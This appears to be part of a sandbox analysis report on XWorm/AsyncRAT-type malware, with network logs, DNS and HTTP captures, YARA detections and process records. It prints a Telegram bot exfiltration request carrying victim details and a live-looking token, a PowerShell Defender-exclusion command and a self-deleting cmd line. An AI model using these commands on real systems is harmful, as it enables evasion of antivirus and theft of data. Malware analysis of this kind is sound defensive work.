                                                                                        Dec 5, 2024 19:41:50.627832890 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:41:50.748508930 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:50.796400070 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:50.797976971 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:41:50.917655945 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:50.917747021 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:41:50.940540075 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:51.051028013 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:41:51.081512928 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:51.081679106 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:41:51.201649904 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:55.771337032 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:41:55.895565033 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:55.895663977 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:41:56.015903950 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:56.015991926 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:41:56.136629105 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:56.183674097 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:56.186172962 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:41:56.305918932 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:56.328907967 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:56.331341028 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:41:56.497447014 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:56.498022079 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:41:56.501293898 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:41:56.624603987 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:06.073461056 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:06.144622087 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:08.474266052 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:08.594216108 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:08.885530949 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:08.887116909 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:09.007143974 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:11.707806110 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:11.827825069 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:12.117835045 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:12.119563103 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:12.239248037 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:22.316967010 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:22.436681986 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:22.436754942 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:22.556427002 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:22.556670904 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:22.676593065 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:22.726538897 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:22.728656054 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:22.848611116 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:22.868735075 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:22.871804953 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:23.033428907 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:23.040474892 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:23.043783903 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:23.163444042 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:23.183664083 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:23.186430931 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:23.349806070 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:26.191755056 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:26.311572075 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:26.601407051 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:26.604302883 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:26.725223064 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:27.613878965 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:27.733982086 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:28.023629904 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:28.025141001 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:28.144985914 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:33.270169020 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:33.390075922 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:33.680033922 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:33.682516098 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:33.802273989 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:36.096592903 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:36.189834118 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:37.817238092 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:37.938021898 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:37.938085079 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:38.058763027 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:38.227034092 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:38.229933023 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:38.349910021 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:38.418977976 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:38.420603991 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:38.540363073 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:43.285732985 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:43.405705929 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:43.405957937 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:43.525729895 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:43.696326017 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:43.704189062 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:43.823995113 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:43.888448954 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:43.957241058 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:44.119843960 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:44.240210056 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:45.959484100 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:46.079230070 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:46.372474909 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:46.375024080 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:46.495085955 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:58.473726034 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:58.594867945 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:58.883826971 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:42:58.890883923 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:42:59.012016058 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:03.833288908 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:03.953114986 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:04.020193100 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:04.140280008 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:04.245042086 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:04.246700048 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:04.366609097 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:04.437499046 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:04.438813925 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:04.559252977 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:04.629434109 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:04.749583006 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:05.040102005 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:05.042164087 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:05.162108898 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:06.096582890 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:06.163345098 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:13.864017963 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:13.983808041 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:13.983876944 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:14.103694916 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:14.103750944 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:14.223606110 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:14.274398088 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:14.276671886 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:14.396787882 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:14.415537119 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:14.417227983 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:14.594500065 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:14.594512939 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:14.596236944 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:14.717488050 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:14.834542990 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:14.839915991 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:15.001737118 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:21.911428928 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:22.031172991 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:22.322407961 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:22.324502945 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:22.445055008 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:24.223189116 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:24.343092918 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:24.696129084 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:24.698239088 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:24.817955017 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:29.270145893 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:29.389885902 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:29.389955997 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:29.510421991 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:29.688528061 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:29.693242073 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:29.813028097 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:29.881428003 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:29.883677959 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:30.003360987 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:36.090598106 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:36.249016047 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:39.786422014 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:39.906135082 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:40.196613073 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:40.201443911 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:40.321149111 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:40.927972078 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:41.047799110 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:41.339454889 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:41.341753960 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:41.461779118 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:41.614613056 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:41.734411001 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:42.024594069 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:42.026532888 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:42.146543026 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:54.129905939 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:54.250108004 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:54.541105032 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:54.547027111 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:54.667028904 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:56.410813093 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:56.530689955 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:56.692152023 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:56.812201023 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:56.823146105 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:56.828046083 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:56.993850946 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:57.103007078 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:43:57.108010054 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:43:57.227807999 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:44:06.093313932 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:44:06.145068884 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:44:08.248128891 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:44:08.368556976 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:44:08.658761024 CET700049742185.196.8.239192.168.2.4
                                                                                        Dec 5, 2024 19:44:08.659554958 CET497427000192.168.2.4185.196.8.239
                                                                                        Dec 5, 2024 19:44:08.779423952 CET700049742185.196.8.239192.168.2.4

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 5, 2024 19:40:01.839572906 CET5224853192.168.2.41.1.1.1
                                                                                        Dec 5, 2024 19:40:01.983913898 CET53522481.1.1.1192.168.2.4
                                                                                        Dec 5, 2024 19:40:33.712004900 CET4917453192.168.2.41.1.1.1
                                                                                        Dec 5, 2024 19:40:33.849917889 CET53491741.1.1.1192.168.2.4

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Dec 5, 2024 19:40:01.839572906 CET192.168.2.41.1.1.10x7c33Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                        Dec 5, 2024 19:40:33.712004900 CET192.168.2.41.1.1.10xed25Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Dec 5, 2024 19:40:01.983913898 CET1.1.1.1192.168.2.40x7c33No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                        Dec 5, 2024 19:40:33.849917889 CET1.1.1.1192.168.2.40xed25No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                        HTTP Request Dependency Graph

                                                                                        • api.telegram.org
                                                                                        • ip-api.com

                                                                                        HTTP Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.449730208.95.112.1802852C:\Users\user\Desktop\file.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 5, 2024 19:40:02.117707014 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                        Host: ip-api.com
                                                                                        Connection: Keep-Alive
                                                                                        Dec 5, 2024 19:40:03.304946899 CET175INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 18:40:02 GMT
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        Content-Length: 6
                                                                                        Access-Control-Allow-Origin: *
                                                                                        X-Ttl: 60
                                                                                        X-Rl: 44
                                                                                        Data Raw: 66 61 6c 73 65 0a
                                                                                        Data Ascii: false


                                                                                        HTTPS Proxied Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.449740149.154.167.2204432852C:\Users\user\Desktop\file.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 18:40:35 UTC447OUTGET /bot8070077125:AAEdRIyp1anHye9Y0jcV8uNF6U4mmijN8Pk/sendMessage?chat_id=1818813749&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A4C67EC226C1C2FB3C434%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20YD8OYZ2%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        Connection: Keep-Alive
                                                                                        2024-12-05 18:40:35 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Thu, 05 Dec 2024 18:40:35 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 440
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-12-05 18:40:35 UTC440INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 30 37 30 30 37 37 31 32 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 69 6e 61 6e 63 65 42 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 42 69 6e 61 47 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 31 38 38 31 33 37 34 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 64 72 6b 75 73 74 30 6d 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 72 4b 75 73 74 30 6d 5f 6e 65 77 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 34 32 34 30 33 35 2c 22 74 65 78 74 22 3a 22 5c 75 32 36 32 30 20 5b 58 57 6f 72
                                                                                        Data Ascii: {"ok":true,"result":{"message_id":41,"from":{"id":8070077125,"is_bot":true,"first_name":"BinanceBot","username":"BinaGoBot"},"chat":{"id":1818813749,"first_name":"drkust0m","username":"DrKust0m_new","type":"private"},"date":1733424035,"text":"\u2620 [XWor


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:0
                                                                                        Start time:13:39:55
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Users\user\Desktop\file.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                        Imagebase:0xc30000
                                                                                        File size:3'507'712 bytes
                                                                                        MD5 hash:7823E902900881094372948957825FE1
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1759365253.0000000005E50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1694062530.0000000000C32000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1754386213.0000000003504000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1754386213.0000000003504000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1754386213.0000000003504000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:1
                                                                                        Start time:13:40:00
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Users\user\Desktop\file.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                        Imagebase:0x520000
                                                                                        File size:3'507'712 bytes
                                                                                        MD5 hash:7823E902900881094372948957825FE1
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000002.4176352782.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000002.4156478966.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.4156478966.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000001.00000002.4156478966.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000002.4176352782.0000000002C13000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:2
                                                                                        Start time:13:40:00
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"cmd" /c timeout /t 1 && DEL /f file.exe
                                                                                        Imagebase:0x240000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:3
                                                                                        Start time:13:40:01
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:4
                                                                                        Start time:13:40:01
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:timeout /t 1
                                                                                        Imagebase:0x2d0000
                                                                                        File size:25'088 bytes
                                                                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:6
                                                                                        Start time:13:40:03
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
                                                                                        Imagebase:0xfa0000
                                                                                        File size:433'152 bytes
                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:7
                                                                                        Start time:13:40:03
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:9
                                                                                        Start time:13:40:08
                                                                                        Start date:05/12/2024
